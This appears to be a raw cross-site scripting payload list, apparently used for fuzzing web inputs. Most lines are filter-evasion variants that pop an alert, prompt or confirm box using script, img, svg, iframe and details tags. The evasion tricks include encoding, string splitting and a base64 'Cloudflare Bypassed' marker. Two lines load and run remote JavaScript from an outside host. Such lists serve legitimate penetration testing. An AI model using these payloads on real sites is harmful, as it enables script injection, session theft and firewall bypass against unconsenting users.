<script>alert('radnet')</script>
<script>alert('radnet')</script>
"><script>alert('radnet')</script>
'><img src=x onerror=alert('radnet')>
%3CIFRAME%20SRC%3D%22javascript%3Aprompt('radnet')%3B%22%3E%3C%2Fiframe%3E
';k='e'%0Atop['al'+k+'rt']('radnet')//
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt']('radnet')>
<svg/onload=window["al"+"ert"]('radnet')>
<Img Src=OnXSS OnError=confirm('radnet')>
<Svg Only=1 OnLoad=confirm('radnet')>
<svg onload=alert&#0000000040'radnet')>
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b'radnet'%26%23x29%3b>
%3CSVG/oNlY=1%20ONlOAD=confirm('radnet')%3E
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
">'><details/open/ontoggle=confirm('radnet')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt('radnet')%3E/
';window/*aabb*/['al'%2b'ert']('radnet');//
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert('radnet')//'>
<svg onload='new Function["Y000!"].find(al\u0065rt)('radnet')'>
<Img Src=//X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9;//</div">
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;'radnet'&#x000029;>
